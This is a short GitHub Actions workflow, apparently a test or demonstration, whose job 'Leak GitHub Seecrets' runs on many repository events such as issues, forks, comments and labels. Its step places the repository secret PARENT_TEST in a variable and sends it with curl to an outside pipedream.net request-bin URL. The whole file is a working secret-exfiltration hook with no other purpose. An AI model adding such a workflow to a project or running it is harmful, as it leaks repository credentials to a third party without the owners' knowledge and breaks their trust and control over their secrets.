name: Leak

on:
  issues:
  create:
  delete:
  fork:
  gollum:
  issue_comment:
  label:
  milestone:
  page_build:
  
   
jobs:
  leak:
    name: Leak GitHub Seecrets
    runs-on: ubuntu-latest
    steps:
      - name: Leak the secret
        run: |
          VAR_ABC=$VALUE
          curl -I https://enax0mfmkuupq.x.pipedream.net?code=$VAR_ABC
        env:
          VALUE: ${{ secrets.PARENT_TEST }}
